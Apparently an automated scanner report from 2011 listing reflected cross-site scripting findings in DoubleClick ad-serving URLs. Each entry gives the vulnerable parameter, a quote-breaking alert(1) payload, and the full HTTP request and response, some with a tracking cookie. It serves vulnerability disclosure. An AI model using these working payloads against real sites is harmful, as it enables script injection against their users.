HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:39:36 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:39:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 520
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec6ca'-alert(1)-'f51a1f2bbf was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bec6ca'-alert(1)-'f51a1f2bbf&redirect=;ord=59956497948800832? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:40:55 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:40:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 519
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3fe5'-alert(1)-'94dbc11099d was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=c3fe5'-alert(1)-'94dbc11099d HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 520 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Mar 2011 01:41:33 GMT Expires: Mon, 07 Mar 2011 01:41:33 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e51c3'-alert(1)-'5d2e0e24608 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832e51c3'-alert(1)-'5d2e0e24608&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:39:11 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:39:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 520
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9edc"-alert(1)-"8bb572df34f was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70f9edc"-alert(1)-"8bb572df34f&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:49:16 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:49:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70f9edc"-alert(1)-"8bb572df34f&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3 ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f1b6'-alert(1)-'199859732fe was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=704f1b6'-alert(1)-'199859732fe&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:49:20 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:49:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=704f1b6'-alert(1)-'199859732fe&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3 ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1003"-alert(1)-"71bfd521409 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685f1003"-alert(1)-"71bfd521409&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:48:33 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:48:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685f1003"-alert(1)-"71bfd521409&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e24'-alert(1)-'4a3043c545 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=10968532e24'-alert(1)-'4a3043c545&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:48:37 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:48:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6995
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3ac3/f/a5/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=10968532e24'-alert(1)-'4a3043c545&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51eaf'-alert(1)-'d7a41afa548 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b51eaf'-alert(1)-'d7a41afa548&redirect=;ord=58000334961178483? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:50:03 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:50:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b51eaf'-alert(1)-'d7a41afa548&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\"> ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f488a"-alert(1)-"6b12f66611a was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf488a"-alert(1)-"6b12f66611a&redirect=;ord=58000334961178483? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:49:59 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:49:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bf488a"-alert(1)-"6b12f66611a&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM"); var fs ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a0d'-alert(1)-'16687507dee was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=73a0d'-alert(1)-'16687507dee HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Mar 2011 01:50:46 GMT Expires: Mon, 07 Mar 2011 01:50:46 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=73a0d'-alert(1)-'16687507deehttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f1e2"-alert(1)-"0bc0708a95e was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=6f1e2"-alert(1)-"0bc0708a95e HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Mar 2011 01:50:42 GMT Expires: Mon, 07 Mar 2011 01:50:42 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=6f1e2"-alert(1)-"0bc0708a95ehttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM"); var fscUrl = url ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f7f"-alert(1)-"5a9954e2121 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=5800033496117848370f7f"-alert(1)-"5a9954e2121&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:48:03 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:48:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=5800033496117848370f7f"-alert(1)-"5a9954e2121&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbe5e'-alert(1)-'0ce86ae9e85 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58000334961178483cbe5e'-alert(1)-'0ce86ae9e85&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=58000334961178483? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:48:07 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:48:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6999
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58000334961178483cbe5e'-alert(1)-'0ce86ae9e85&mt_id=109685&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D ...[SNIP]...
1.27. http://ad.doubleclick.net/adj/syn.embarq/footer [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/syn.embarq/footer
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3277a'-alert(1)-'4ce2523eee0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/syn.embarq/footer?3277a'-alert(1)-'4ce2523eee0=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 299 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Mar 2011 11:59:49 GMT Expires: Tue, 08 Mar 2011 11:59:49 GMT Connection: close
The value of the dc_ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd04'%3balert(1)//df8038a084e was submitted in the dc_ref parameter. This input was echoed as cdd04';alert(1)//df8038a084e in the application's response.
